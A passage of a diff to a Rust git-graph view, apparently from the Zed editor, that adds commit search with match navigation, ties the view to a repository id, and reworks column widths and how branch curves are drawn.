workspace.items_of_type::(cx).next(); + let Some(repo) = + workspace.project().read(cx).active_repository(cx) + else { + return; + }; + let selected_repo_id = repo.read(cx).id; + + let existing = workspace + .items_of_type::(cx) + .find(|graph| graph.read(cx).repo_id == selected_repo_id); if let 
Some(existing) = existing { existing.update(cx, |graph, cx| { - graph.select_commit_by_sha(&sha, cx); + graph.select_commit_by_sha(sha.as_str(), cx); }); workspace.activate_item(&existing, true, true, window, cx); return; } - let project = workspace.project().clone(); + let git_store = + workspace.project().read(cx).git_store().clone(); let workspace_handle = workspace.weak_handle(); let git_graph = cx.new(|cx| { let mut graph = GitGraph::new( - project, + selected_repo_id, + git_store, workspace_handle, None, window, cx, ); - graph.select_commit_by_sha(&sha, cx); + graph.select_commit_by_sha(sha.as_str(), cx); graph }); workspace.add_item_to_active_pane( @@ -789,7 +849,7 @@ pub fn init(cx: &mut App) { move |_: &git::FileHistory, window, cx| { workspace .update(cx, |workspace, cx| { - let project = workspace.project().clone(); + let git_store = workspace.project().read(cx).git_store().clone(); let workspace_handle = workspace.weak_handle(); let file_path = active_file.path(); let file_worktree_id = active_file.worktree_id(cx); @@ -799,23 +859,20 @@ pub fn init(cx: &mut App) { path: file_path.clone(), }; - let Some((_repo, repo_path)) = project - .read(cx) - .git_store() + let Some((repo, repo_path)) = git_store .read(cx) .repository_and_path_for_project_path(&project_path, cx) else { return; }; - // todo! 
pass repo id to git graph as well - // let repo_id = repo.read(cx).id; - + let repo_id = repo.read(cx).id; let log_source = LogSource::File(repo_path); let git_graph = cx.new(|cx| { GitGraph::new( - project, + repo_id, + git_store, workspace_handle, Some(log_source), window, @@ -839,8 +896,8 @@ pub fn init(cx: &mut App) { .detach(); } -fn lane_center_x(bounds: Bounds, lane: f32, horizontal_scroll_offset: Pixels) -> Pixels { - bounds.origin.x + LEFT_PADDING + lane * LANE_WIDTH + LANE_WIDTH / 2.0 - horizontal_scroll_offset +fn lane_center_x(bounds: Bounds, lane: f32) -> Pixels { + bounds.origin.x + LEFT_PADDING + lane * LANE_WIDTH + LANE_WIDTH / 2.0 } fn to_row_center( @@ -900,15 +957,14 @@ fn compute_diff_stats(diff: &CommitDiff) -> (usize, usize) { pub struct GitGraph { focus_handle: FocusHandle, + search_state: SearchState, graph_data: GraphData, - project: Entity, + git_store: Entity, workspace: WeakEntity, context_menu: Option<(Entity, Point, Subscription)>, row_height: Pixels, table_interaction_state: Entity, - table_column_widths: Entity, - horizontal_scroll_offset: Pixels, - graph_viewport_width: Pixels, + column_widths: Entity, selected_entry_idx: Option, hovered_entry_idx: Option, graph_canvas_bounds: Rc>>>, @@ -918,24 +974,77 @@ pub struct GitGraph { selected_commit_diff_stats: Option<(usize, usize)>, _commit_diff_task: Option>, commit_details_split_state: Entity, - selected_repo_id: Option, + repo_id: RepositoryId, changed_files_scroll_handle: UniformListScrollHandle, pending_select_sha: Option, } impl GitGraph { + fn invalidate_state(&mut self, cx: &mut Context) { + self.graph_data.clear(); + self.search_state.matches.clear(); + self.search_state.selected_index = None; + self.search_state.state.next_state(); + cx.notify(); + } + fn row_height(cx: &App) -> Pixels { let settings = ThemeSettings::get_global(cx); let font_size = settings.buffer_font_size(cx); font_size + px(12.0) } - fn graph_content_width(&self) -> Pixels { - (LANE_WIDTH * 
self.graph_data.max_lanes.min(8) as f32) + LEFT_PADDING * 2.0 + fn graph_canvas_content_width(&self) -> Pixels { + (LANE_WIDTH * self.graph_data.max_lanes.max(6) as f32) + LEFT_PADDING * 2.0 + } + + fn preview_column_fractions(&self, window: &Window, cx: &App) -> [f32; 5] { + let fractions = self + .column_widths + .read(cx) + .preview_fractions(window.rem_size()); + [ + fractions[0], + fractions[1], + fractions[2], + fractions[3], + fractions[4], + ] + } + + fn table_column_width_config(&self, window: &Window, cx: &App) -> ColumnWidthConfig { + let [_, description, date, author, commit] = self.preview_column_fractions(window, cx); + let table_total = description + date + author + commit; + + let widths = if table_total > 0.0 { + vec![ + DefiniteLength::Fraction(description / table_total), + DefiniteLength::Fraction(date / table_total), + DefiniteLength::Fraction(author / table_total), + DefiniteLength::Fraction(commit / table_total), + ] + } else { + vec![ + DefiniteLength::Fraction(0.25), + DefiniteLength::Fraction(0.25), + DefiniteLength::Fraction(0.25), + DefiniteLength::Fraction(0.25), + ] + }; + + ColumnWidthConfig::explicit(widths) + } + + fn graph_viewport_width(&self, window: &Window, cx: &App) -> Pixels { + self.column_widths + .read(cx) + .preview_column_width(0, window) + .unwrap_or_else(|| self.graph_canvas_content_width()) } pub fn new( - project: Entity, + repo_id: RepositoryId, + git_store: Entity, workspace: WeakEntity, log_source: Option, window: &mut Window, @@ -945,7 +1054,6 @@ impl GitGraph { cx.on_focus(&focus_handle, window, |_, _, cx| cx.notify()) .detach(); - let git_store = project.read(cx).git_store().clone(); let accent_colors = cx.theme().accents(); let graph = GraphData::new(accent_colors_count(accent_colors)); let log_source = log_source.unwrap_or_default(); @@ -953,35 +1061,42 @@ impl GitGraph { cx.subscribe(&git_store, |this, _, event, cx| match event { GitStoreEvent::RepositoryUpdated(updated_repo_id, repo_event, _) => { - if this 
- .selected_repo_id - .as_ref() - .is_some_and(|repo_id| repo_id == updated_repo_id) - { - if let Some(repository) = this.get_selected_repository(cx) { + if this.repo_id == *updated_repo_id { + if let Some(repository) = this.get_repository(cx) { this.on_repository_event(repository, repo_event, cx); } } } - GitStoreEvent::ActiveRepositoryChanged(changed_repo_id) => { - // todo(git_graph): Make this selectable from UI so we don't have to always use active repository - if this.selected_repo_id != *changed_repo_id { - this.selected_repo_id = *changed_repo_id; - this.graph_data.clear(); - cx.notify(); - } - } _ => {} }) .detach(); - let active_repository = project - .read(cx) - .active_repository(cx) - .map(|repo| repo.read(cx).id); + let search_editor = cx.new(|cx| { + let mut editor = Editor::single_line(window, cx); + editor.set_placeholder_text("Search commits…", window, cx); + editor + }); let table_interaction_state = cx.new(|cx| TableInteractionState::new(cx)); - let table_column_widths = cx.new(|cx| TableColumnWidths::new(4, cx)); + let column_widths = cx.new(|_cx| { + RedistributableColumnsState::new( + 5, + vec![ + DefiniteLength::Fraction(0.14), + DefiniteLength::Fraction(0.6192), + DefiniteLength::Fraction(0.1032), + DefiniteLength::Fraction(0.086), + DefiniteLength::Fraction(0.0516), + ], + vec![ + TableResizeBehavior::Resizable, + TableResizeBehavior::Resizable, + TableResizeBehavior::Resizable, + TableResizeBehavior::Resizable, + TableResizeBehavior::Resizable, + ], + ) + }); let mut row_height = Self::row_height(cx); cx.observe_global_in::(window, move |this, _window, cx| { @@ -999,16 +1114,21 @@ impl GitGraph { let mut this = GitGraph { focus_handle, - project, + git_store, + search_state: SearchState { + case_sensitive: false, + editor: search_editor, + matches: IndexSet::default(), + selected_index: None, + state: QueryState::Empty, + }, workspace, graph_data: graph, _commit_diff_task: None, context_menu: None, row_height, table_interaction_state, - 
table_column_widths, - horizontal_scroll_offset: px(0.), - graph_viewport_width: px(88.), + column_widths, selected_entry_idx: None, hovered_entry_idx: None, graph_canvas_bounds: Rc::new(Cell::new(None)), @@ -1017,7 +1137,7 @@ impl GitGraph { log_source, log_order, commit_details_split_state: cx.new(|_cx| SplitState::new()), - selected_repo_id: active_repository, + repo_id, changed_files_scroll_handle: UniformListScrollHandle::new(), pending_select_sha: None, }; @@ -1046,7 +1166,7 @@ impl GitGraph { .and_then(|data| data.commit_oid_to_index.get(&oid).copied()) }) { - self.select_entry(pending_sha_index, cx); + self.select_entry(pending_sha_index, ScrollStrategy::Nearest, cx); } } GitGraphEvent::LoadingError => { @@ -1082,7 +1202,7 @@ impl GitGraph { pending_sha_index }) { - self.select_entry(pending_selection_index, cx); + self.select_entry(pending_selection_index, ScrollStrategy::Nearest, cx); self.pending_select_sha.take(); } @@ -1090,14 +1210,19 @@ impl GitGraph { } } } - RepositoryEvent::BranchChanged | RepositoryEvent::MergeHeadsChanged => { + RepositoryEvent::HeadChanged | RepositoryEvent::BranchListChanged => { self.pending_select_sha = None; // Only invalidate if we scanned atleast once, // meaning we are not inside the initial repo loading state // NOTE: this fixes an loading performance regression if repository.read(cx).scan_id > 1 { - self.graph_data.clear(); - cx.notify(); + self.invalidate_state(cx); + } + } + RepositoryEvent::StashEntriesChanged if self.log_source == LogSource::All => { + self.pending_select_sha = None; + if repository.read(cx).scan_id > 1 { + self.invalidate_state(cx); } } RepositoryEvent::GraphEvent(_, _) => {} @@ -1106,7 +1231,7 @@ impl GitGraph { } fn fetch_initial_graph_data(&mut self, cx: &mut App) { - if let Some(repository) = self.get_selected_repository(cx) { + if let Some(repository) = self.get_repository(cx) { repository.update(cx, |repository, cx| { let commits = repository .graph_data(self.log_source.clone(), 
self.log_order, 0..usize::MAX, cx) @@ -1116,11 +1241,9 @@ impl GitGraph { } } - fn get_selected_repository(&self, cx: &App) -> Option> { - let project = self.project.read(cx); - self.selected_repo_id - .as_ref() - .and_then(|repo_id| project.repositories(cx).get(&repo_id).cloned()) + fn get_repository(&self, cx: &App) -> Option> { + let git_store = self.git_store.read(cx); + git_store.repositories().get(&self.repo_id).cloned() } fn render_chip(&self, name: &SharedString, accent_color: gpui::Hsla) -> impl IntoElement { @@ -1136,7 +1259,7 @@ impl GitGraph { _window: &mut Window, cx: &mut Context, ) -> Vec> { - let repository = self.get_selected_repository(cx); + let repository = self.get_repository(cx); let row_height = self.row_height; @@ -1194,6 +1317,7 @@ impl GitGraph { .unwrap_or_else(|| accent_colors.0.first().copied().unwrap_or_default()); let is_selected = self.selected_entry_idx == Some(idx); + let is_matched = self.search_state.matches.contains(&commit.data.sha); let column_label = |label: SharedString| { Label::new(label) .when(!is_selected, |c| c.color(Color::Muted)) @@ -1201,11 +1325,49 @@ impl GitGraph { .into_any_element() }; + let subject_label = if is_matched { + let query = match &self.search_state.state { + QueryState::Confirmed((query, _)) => Some(query.clone()), + _ => None, + }; + let highlight_ranges = query + .and_then(|q| { + let ranges = if self.search_state.case_sensitive { + subject + .match_indices(q.as_str()) + .map(|(start, matched)| start..start + matched.len()) + .collect::>() + } else { + let q = q.to_lowercase(); + let subject_lower = subject.to_lowercase(); + + subject_lower + .match_indices(&q) + .filter_map(|(start, matched)| { + let end = start + matched.len(); + subject.is_char_boundary(start).then_some(()).and_then( + |_| subject.is_char_boundary(end).then_some(start..end), + ) + }) + .collect::>() + }; + + (!ranges.is_empty()).then_some(ranges) + }) + .unwrap_or_default(); + HighlightedLabel::from_ranges(subject.clone(), 
highlight_ranges) + .when(!is_selected, |c| c.color(Color::Muted)) + .truncate() + .into_any_element() + } else { + column_label(subject.clone()) + }; + vec![ div() .id(ElementId::NamedInteger("commit-subject".into(), idx as u64)) .overflow_hidden() - .tooltip(Tooltip::text(subject.clone())) + .tooltip(Tooltip::text(subject)) .child( h_flex() .gap_2() @@ -1219,7 +1381,7 @@ impl GitGraph { .map(|name| self.render_chip(name, accent_color)), ) })) - .child(column_label(subject)), + .child(subject_label), ) .into_any_element(), column_label(formatted_time.into()), @@ -1237,27 +1399,125 @@ impl GitGraph { cx.notify(); } - fn select_prev(&mut self, _: &SelectPrevious, _window: &mut Window, cx: &mut Context) { + fn select_first(&mut self, _: &SelectFirst, _window: &mut Window, cx: &mut Context) { + self.select_entry(0, ScrollStrategy::Nearest, cx); + } + + fn select_prev(&mut self, _: &SelectPrevious, window: &mut Window, cx: &mut Context) { if let Some(selected_entry_idx) = &self.selected_entry_idx { - self.select_entry(selected_entry_idx.saturating_sub(1), cx); + self.select_entry( + selected_entry_idx.saturating_sub(1), + ScrollStrategy::Nearest, + cx, + ); } else { - self.select_entry(0, cx); + self.select_first(&SelectFirst, window, cx); } } fn select_next(&mut self, _: &SelectNext, window: &mut Window, cx: &mut Context) { if let Some(selected_entry_idx) = &self.selected_entry_idx { - self.select_entry(selected_entry_idx.saturating_add(1), cx); + self.select_entry( + selected_entry_idx + .saturating_add(1) + .min(self.graph_data.commits.len().saturating_sub(1)), + ScrollStrategy::Nearest, + cx, + ); } else { self.select_prev(&SelectPrevious, window, cx); } } + fn select_last(&mut self, _: &SelectLast, _window: &mut Window, cx: &mut Context) { + self.select_entry( + self.graph_data.commits.len().saturating_sub(1), + ScrollStrategy::Nearest, + cx, + ); + } + fn confirm(&mut self, _: &menu::Confirm, window: &mut Window, cx: &mut Context) { 
self.open_selected_commit_view(window, cx); } - fn select_entry(&mut self, idx: usize, cx: &mut Context) { + fn search(&mut self, query: SharedString, cx: &mut Context) { + let Some(repo) = self.get_repository(cx) else { + return; + }; + + self.search_state.matches.clear(); + self.search_state.selected_index = None; + self.search_state.editor.update(cx, |editor, _cx| { + editor.set_text_style_refinement(Default::default()); + }); + + if query.as_str().is_empty() { + self.search_state.state = QueryState::Empty; + cx.notify(); + return; + } + + let (request_tx, request_rx) = smol::channel::unbounded::(); + + repo.update(cx, |repo, cx| { + repo.search_commits( + self.log_source.clone(), + SearchCommitArgs { + query: query.clone(), + case_sensitive: self.search_state.case_sensitive, + }, + request_tx, + cx, + ); + }); + + let search_task = cx.spawn(async move |this, cx| { + while let Ok(first_oid) = request_rx.recv().await { + let mut pending_oids = vec![first_oid]; + while let Ok(oid) = request_rx.try_recv() { + pending_oids.push(oid); + } + + this.update(cx, |this, cx| { + if this.search_state.selected_index.is_none() { + this.search_state.selected_index = Some(0); + this.select_commit_by_sha(first_oid, cx); + } + + this.search_state.matches.extend(pending_oids); + cx.notify(); + }) + .ok(); + } + + this.update(cx, |this, cx| { + if this.search_state.matches.is_empty() { + this.search_state.editor.update(cx, |editor, cx| { + editor.set_text_style_refinement(TextStyleRefinement { + color: Some(Color::Error.color(cx)), + ..Default::default() + }); + }); + } + }) + .ok(); + }); + + self.search_state.state = QueryState::Confirmed((query, search_task)); + } + + fn confirm_search(&mut self, _: &menu::Confirm, _window: &mut Window, cx: &mut Context) { + let query = self.search_state.editor.read(cx).text(cx).into(); + self.search(query, cx); + } + + fn select_entry( + &mut self, + idx: usize, + scroll_strategy: ScrollStrategy, + cx: &mut Context, + ) { if 
self.selected_entry_idx == Some(idx) { return; } @@ -1268,9 +1528,7 @@ impl GitGraph { self.changed_files_scroll_handle .scroll_to_item(0, ScrollStrategy::Top); self.table_interaction_state.update(cx, |state, cx| { - state - .scroll_handle - .scroll_to_item(idx, ScrollStrategy::Nearest); + state.scroll_handle.scroll_to_item(idx, scroll_strategy); cx.notify(); }); @@ -1280,7 +1538,7 @@ impl GitGraph { let sha = commit.data.sha.to_string(); - let Some(repository) = self.get_selected_repository(cx) else { + let Some(repository) = self.get_repository(cx) else { return; }; @@ -1301,25 +1559,84 @@ impl GitGraph { cx.notify(); } - pub fn select_commit_by_sha(&mut self, sha: &str, cx: &mut Context) { - let Ok(oid) = sha.parse::() else { + fn select_previous_match(&mut self, cx: &mut Context) { + if self.search_state.matches.is_empty() { return; - }; + } - let Some(selected_repository) = self.get_selected_repository(cx) else { + let mut prev_selection = self.search_state.selected_index.unwrap_or_default(); + + if prev_selection == 0 { + prev_selection = self.search_state.matches.len() - 1; + } else { + prev_selection -= 1; + } + + let Some(&oid) = self.search_state.matches.get_index(prev_selection) else { return; }; - let Some(index) = selected_repository - .read(cx) - .get_graph_data(self.log_source.clone(), self.log_order) - .and_then(|data| data.commit_oid_to_index.get(&oid)) - .copied() - else { + self.search_state.selected_index = Some(prev_selection); + self.select_commit_by_sha(oid, cx); + } + + fn select_next_match(&mut self, cx: &mut Context) { + if self.search_state.matches.is_empty() { + return; + } + + let mut next_selection = self + .search_state + .selected_index + .map(|index| index + 1) + .unwrap_or_default(); + + if next_selection >= self.search_state.matches.len() { + next_selection = 0; + } + + let Some(&oid) = self.search_state.matches.get_index(next_selection) else { return; }; - self.select_entry(index, cx); + self.search_state.selected_index = 
Some(next_selection); + self.select_commit_by_sha(oid, cx); + } + + pub fn set_repo_id(&mut self, repo_id: RepositoryId, cx: &mut Context) { + if repo_id != self.repo_id + && self + .git_store + .read(cx) + .repositories() + .contains_key(&repo_id) + { + self.repo_id = repo_id; + self.invalidate_state(cx); + } + } + + pub fn select_commit_by_sha(&mut self, sha: impl TryInto, cx: &mut Context) { + fn inner(this: &mut GitGraph, oid: Oid, cx: &mut Context) { + let Some(selected_repository) = this.get_repository(cx) else { + return; + }; + + let Some(index) = selected_repository + .read(cx) + .get_graph_data(this.log_source.clone(), this.log_order) + .and_then(|data| data.commit_oid_to_index.get(&oid)) + .copied() + else { + return; + }; + + this.select_entry(index, ScrollStrategy::Center, cx); + } + + if let Ok(oid) = sha.try_into() { + inner(self, oid, cx); + } } fn open_selected_commit_view(&mut self, window: &mut Window, cx: &mut Context) { @@ -1340,7 +1657,7 @@ impl GitGraph { return; }; - let Some(repository) = self.get_selected_repository(cx) else { + let Some(repository) = self.get_repository(cx) else { return; }; @@ -1371,6 +1688,129 @@ impl GitGraph { }) } + fn render_search_bar(&self, cx: &mut Context) -> impl IntoElement { + let color = cx.theme().colors(); + let query_focus_handle = self.search_state.editor.focus_handle(cx); + let search_options = { + let mut options = SearchOptions::NONE; + options.set( + SearchOptions::CASE_SENSITIVE, + self.search_state.case_sensitive, + ); + options + }; + + h_flex() + .w_full() + .p_1p5() + .gap_1p5() + .border_b_1() + .border_color(color.border_variant) + .child( + h_flex() + .h_8() + .flex_1() + .min_w_0() + .px_1p5() + .gap_1() + .border_1() + .border_color(color.border) + .rounded_md() + .bg(color.toolbar_background) + .on_action(cx.listener(Self::confirm_search)) + .child(self.search_state.editor.clone()) + .child(SearchOption::CaseSensitive.as_button( + search_options, + SearchSource::Buffer, + 
query_focus_handle, + )), + ) + .child( + h_flex() + .min_w_64() + .gap_1() + .child({ + let focus_handle = self.focus_handle.clone(); + IconButton::new("git-graph-search-prev", IconName::ChevronLeft) + .shape(ui::IconButtonShape::Square) + .icon_size(IconSize::Small) + .tooltip(move |_, cx| { + Tooltip::for_action_in( + "Select Previous Match", + &SelectPreviousMatch, + &focus_handle, + cx, + ) + }) + .map(|this| { + if self.search_state.matches.is_empty() { + this.disabled(true) + } else { + this.disabled(false).on_click(cx.listener(|this, _, _, cx| { + this.select_previous_match(cx); + })) + } + }) + }) + .child({ + let focus_handle = self.focus_handle.clone(); + IconButton::new("git-graph-search-next", IconName::ChevronRight) + .shape(ui::IconButtonShape::Square) + .icon_size(IconSize::Small) + .tooltip(move |_, cx| { + Tooltip::for_action_in( + "Select Next Match", + &SelectNextMatch, + &focus_handle, + cx, + ) + }) + .map(|this| { + if self.search_state.matches.is_empty() { + this.disabled(true) + } else { + this.disabled(false).on_click(cx.listener(|this, _, _, cx| { + this.select_next_match(cx); + })) + } + }) + }) + .child( + h_flex() + .gap_1p5() + .child( + Label::new(format!( + "{}/{}", + self.search_state + .selected_index + .map(|index| index + 1) + .unwrap_or(0), + self.search_state.matches.len() + )) + .size(LabelSize::Small) + .when(self.search_state.matches.is_empty(), |this| { + this.color(Color::Disabled) + }), + ) + .when( + matches!( + &self.search_state.state, + QueryState::Confirmed((_, task)) if !task.is_ready() + ), + |this| { + this.child( + Icon::new(IconName::ArrowCircle) + .color(Color::Accent) + .size(IconSize::Small) + .with_rotate_animation(2) + .into_any_element(), + ) + }, + ), + ), + ) + } + fn render_loading_spinner(&self, cx: &App) -> AnyElement { let rems = TextSize::Large.rems(cx); Icon::new(IconName::LoadCircle) @@ -1393,7 +1833,7 @@ impl GitGraph { return Empty.into_any_element(); }; - let Some(repository) = 
self.get_selected_repository(cx) else { + let Some(repository) = self.get_repository(cx) else { return Empty.into_any_element(); }; @@ -1413,7 +1853,8 @@ impl GitGraph { .copied() .unwrap_or_else(|| accent_colors.0.first().copied().unwrap_or_default()); - let (author_name, author_email, commit_timestamp, subject) = match &data { + // todo(git graph): We should use the full commit message here + let (author_name, author_email, commit_timestamp, commit_message) = match &data { CommitDataState::Loaded(data) => ( data.author_name.clone(), data.author_email.clone(), @@ -1547,10 +1988,9 @@ impl GitGraph { this.child( Button::new("author-email-copy", author_email.clone()) - .icon(icon) - .icon_size(IconSize::Small) - .icon_color(icon_color) - .icon_position(IconPosition::Start) + .start_icon( + Icon::new(icon).size(IconSize::Small).color(icon_color), + ) .label_size(LabelSize::Small) .truncate(true) .color(Color::Muted) @@ -1595,10 +2035,9 @@ impl GitGraph { }; Button::new("sha-button", &full_sha) - .icon(icon) - .icon_size(IconSize::Small) - .icon_color(icon_color) - .icon_position(IconPosition::Start) + .start_icon( + Icon::new(icon).size(IconSize::Small).color(icon_color), + ) .label_size(LabelSize::Small) .truncate(true) .color(Color::Muted) @@ -1655,10 +2094,9 @@ impl GitGraph { "view-on-provider", format!("View on {}", provider_name), ) - .icon(icon) - .icon_size(IconSize::Small) - .icon_color(Color::Muted) - .icon_position(IconPosition::Start) + .start_icon( + Icon::new(icon).size(IconSize::Small).color(Color::Muted), + ) .label_size(LabelSize::Small) .truncate(true) .color(Color::Muted) @@ -1672,7 +2110,7 @@ impl GitGraph { ), ) .child(Divider::horizontal()) - .child(div().min_w_0().p_2().child(Label::new(subject))) + .child(div().p_2().child(Label::new(commit_message))) .child(Divider::horizontal()) .child( v_flex() @@ -1761,10 +2199,13 @@ impl GitGraph { let first_visible_row = (scroll_offset_y / row_height).floor() as usize; let vertical_scroll_offset = 
scroll_offset_y - (first_visible_row as f32 * row_height); - let horizontal_scroll_offset = self.horizontal_scroll_offset; - let max_lanes = self.graph_data.max_lanes.max(6); - let graph_width = LANE_WIDTH * max_lanes as f32 + LEFT_PADDING * 2.0; + let graph_viewport_width = self.graph_viewport_width(window, cx); + let graph_width = if self.graph_canvas_content_width() > graph_viewport_width { + self.graph_canvas_content_width() + } else { + graph_viewport_width + }; let last_visible_row = first_visible_row + (viewport_height / row_height).ceil() as usize + 1; @@ -1832,8 +2273,7 @@ impl GitGraph { bounds.origin.y + row_idx as f32 * row_height + row_height / 2.0 - vertical_scroll_offset; - let commit_x = - lane_center_x(bounds, row.lane as f32, horizontal_scroll_offset); + let commit_x = lane_center_x(bounds, row.lane as f32); draw_commit_circle(commit_x, row_y_center, row_color, window); } @@ -1845,8 +2285,7 @@ impl GitGraph { continue; }; - let line_x = - lane_center_x(bounds, start_column as f32, horizontal_scroll_offset); + let line_x = lane_center_x(bounds, start_column as f32); let start_row = line.full_interval.start as i32 - first_visible_row as i32; @@ -1862,6 +2301,8 @@ impl GitGraph { builder.move_to(point(line_x, from_y)); let segments = &line.segments[start_segment_idx..]; + let desired_curve_height = row_height / 3.0; + let desired_curve_width = LANE_WIDTH / 3.0; for (segment_idx, segment) in segments.iter().enumerate() { let is_last = segment_idx + 1 == segments.len(); @@ -1889,11 +2330,7 @@ impl GitGraph { on_row, curve_kind, } => { - let mut to_column = lane_center_x( - bounds, - *to_column as f32, - horizontal_scroll_offset, - ); + let mut to_column = lane_center_x(bounds, *to_column as f32); let mut to_row = to_row_center( *on_row - first_visible_row, @@ -1910,53 +2347,76 @@ impl GitGraph { -COMMIT_CIRCLE_RADIUS - COMMIT_CIRCLE_STROKE_WIDTH }; - let control = match curve_kind { + match curve_kind { CurveKind::Checkout => { if is_last { to_column 
-= column_shift; } + + let available_curve_width = + (to_column - current_column).abs(); + let available_curve_height = + (to_row - current_row).abs(); + let curve_width = + desired_curve_width.min(available_curve_width); + let curve_height = + desired_curve_height.min(available_curve_height); + let signed_curve_width = if going_right { + curve_width + } else { + -curve_width + }; + let curve_start = + point(current_column, to_row - curve_height); + let curve_end = + point(current_column + signed_curve_width, to_row); + let curve_control = point(current_column, to_row); + builder.move_to(point(current_column, current_row)); - point(current_column, to_row) + builder.line_to(curve_start); + builder.move_to(curve_start); + builder.curve_to(curve_end, curve_control); + builder.move_to(curve_end); + builder.line_to(point(to_column, to_row)); } CurveKind::Merge => { if is_last { to_row -= COMMIT_CIRCLE_RADIUS; } - builder.move_to(point( - current_column + column_shift, - current_row - COMMIT_CIRCLE_RADIUS, - )); - point(to_column, current_row) - } - }; - - match curve_kind { - CurveKind::Checkout - if (to_row - current_row).abs() > row_height => - { - let start_curve = - point(current_column, current_row + row_height); - builder.line_to(start_curve); - builder.move_to(start_curve); - } - CurveKind::Merge - if (to_column - current_column).abs() > LANE_WIDTH => - { - let column_shift = - if going_right { LANE_WIDTH } else { -LANE_WIDTH }; - let start_curve = point( + let merge_start = point( current_column + column_shift, current_row - COMMIT_CIRCLE_RADIUS, ); - - builder.line_to(start_curve); - builder.move_to(start_curve); + let available_curve_width = + (to_column - merge_start.x).abs(); + let available_curve_height = + (to_row - merge_start.y).abs(); + let curve_width = + desired_curve_width.min(available_curve_width); + let curve_height = + desired_curve_height.min(available_curve_height); + let signed_curve_width = if going_right { + curve_width + } else { + 
-curve_width + }; + let curve_start = point( + to_column - signed_curve_width, + merge_start.y, + ); + let curve_end = + point(to_column, merge_start.y + curve_height); + let curve_control = point(to_column, merge_start.y); + + builder.move_to(merge_start); + builder.line_to(curve_start); + builder.move_to(curve_start); + builder.curve_to(curve_end, curve_control); + builder.move_to(curve_end); + builder.line_to(point(to_column, to_row)); } - _ => {} - }; - - builder.curve_to(point(to_column, to_row), control); + } current_row = to_row; current_column = to_column; builder.move_to(point(current_column, current_row)); @@ -1996,9 +2456,8 @@ impl GitGraph { let local_y = position_y - canvas_bounds.origin.y; if local_y >= px(0.) && local_y < canvas_bounds.size.height { - let row_in_viewport = (local_y / self.row_height).floor() as usize; - let scroll_rows = (scroll_offset_y / self.row_height).floor() as usize; - let absolute_row = scroll_rows + row_in_viewport; + let absolute_y = local_y + scroll_offset_y; + let absolute_row = (absolute_y / self.row_height).floor() as usize; if absolute_row < self.graph_data.commits.len() { return Some(absolute_row); @@ -2032,7 +2491,7 @@ impl GitGraph { cx: &mut Context, ) { if let Some(row) = self.row_at_position(event.position().y, cx) { - self.select_entry(row, cx); + self.select_entry(row, ScrollStrategy::Nearest, cx); if event.click_count() >= 2 { self.open_commit_view(row, window, cx); } @@ -2063,25 +2522,8 @@ impl GitGraph { let new_y = (current_offset.y + delta.y).clamp(max_vertical_scroll, px(0.)); let new_offset = Point::new(current_offset.x, new_y); - let max_lanes = self.graph_data.max_lanes.max(1); - let graph_content_width = LANE_WIDTH * max_lanes as f32 + LEFT_PADDING * 2.0; - let max_horizontal_scroll = (graph_content_width - self.graph_viewport_width).max(px(0.)); - - let new_horizontal_offset = - (self.horizontal_scroll_offset - delta.x).clamp(px(0.), max_horizontal_scroll); - - let vertical_changed = new_offset != 
current_offset; - let horizontal_changed = new_horizontal_offset != self.horizontal_scroll_offset; - - if vertical_changed { + if new_offset != current_offset { table_state.set_scroll_offset(new_offset); - } - - if horizontal_changed { - self.horizontal_scroll_offset = new_horizontal_offset; - } - - if vertical_changed || horizontal_changed { cx.notify(); } } @@ -2123,40 +2565,40 @@ impl GitGraph { impl Render for GitGraph { fn render(&mut self, window: &mut Window, cx: &mut Context) -> impl IntoElement { - let description_width_fraction = 0.72; - let date_width_fraction = 0.12; - let author_width_fraction = 0.10; - let commit_width_fraction = 0.06; - + // This happens when we changed branches, we should refresh our search as well + if let QueryState::Pending(query) = &mut self.search_state.state { + let query = std::mem::take(query); + self.search_state.state = QueryState::Empty; + self.search(query, cx); + } let (commit_count, is_loading) = match self.graph_data.max_commit_count { AllCommitCount::Loaded(count) => (count, true), AllCommitCount::NotLoaded => { - let (commit_count, is_loading) = - if let Some(repository) = self.get_selected_repository(cx) { - repository.update(cx, |repository, cx| { - // Start loading the graph data if we haven't started already - let GraphDataResponse { - commits, - is_loading, - error: _, - } = repository.graph_data( - self.log_source.clone(), - self.log_order, - 0..usize::MAX, - cx, - ); - self.graph_data.add_commits(&commits); - (commits.len(), is_loading) - }) - } else { - (0, false) - }; + let (commit_count, is_loading) = if let Some(repository) = self.get_repository(cx) { + repository.update(cx, |repository, cx| { + // Start loading the graph data if we haven't started already + let GraphDataResponse { + commits, + is_loading, + error: _, + } = repository.graph_data( + self.log_source.clone(), + self.log_order, + 0..usize::MAX, + cx, + ); + self.graph_data.add_commits(&commits); + (commits.len(), is_loading) + }) + } else { + 
(0, false) + }; (commit_count, is_loading) } }; - let error = self.get_selected_repository(cx).and_then(|repo| { + let error = self.get_repository(cx).and_then(|repo| { repo.read(cx) .get_graph_data(self.log_source.clone(), self.log_order) .and_then(|data| data.error.clone()) @@ -2184,131 +2626,200 @@ impl Render for GitGraph { this.child(self.render_loading_spinner(cx)) }) } else { - div() + let header_resize_info = HeaderResizeInfo::from_state(&self.column_widths, cx); + let header_context = TableRenderContext::for_column_widths( + Some(self.column_widths.read(cx).widths_to_render()), + true, + ); + let [ + graph_fraction, + description_fraction, + date_fraction, + author_fraction, + commit_fraction, + ] = self.preview_column_fractions(window, cx); + let table_fraction = + description_fraction + date_fraction + author_fraction + commit_fraction; + let table_width_config = self.table_column_width_config(window, cx); + + h_flex() .size_full() - .flex() - .flex_row() .child( div() - .w(self.graph_content_width()) - .h_full() + .flex_1() + .min_w_0() + .size_full() .flex() .flex_col() - .child( - div() - .p_2() - .border_b_1() - .whitespace_nowrap() - .border_color(cx.theme().colors().border) - .child(Label::new("Graph").color(Color::Muted)), - ) - .child( - div() - .id("graph-canvas") - .flex_1() - .overflow_hidden() - .child(self.render_graph(window, cx)) - .on_scroll_wheel(cx.listener(Self::handle_graph_scroll)) - .on_mouse_move(cx.listener(Self::handle_graph_mouse_move)) - .on_click(cx.listener(Self::handle_graph_click)) - .on_hover(cx.listener(|this, &is_hovered: &bool, _, cx| { - if !is_hovered && this.hovered_entry_idx.is_some() { - this.hovered_entry_idx = None; - cx.notify(); - } - })), - ), - ) - .child({ - let row_height = self.row_height; - let selected_entry_idx = self.selected_entry_idx; - let hovered_entry_idx = self.hovered_entry_idx; - let weak_self = cx.weak_entity(); - let focus_handle = self.focus_handle.clone(); - 
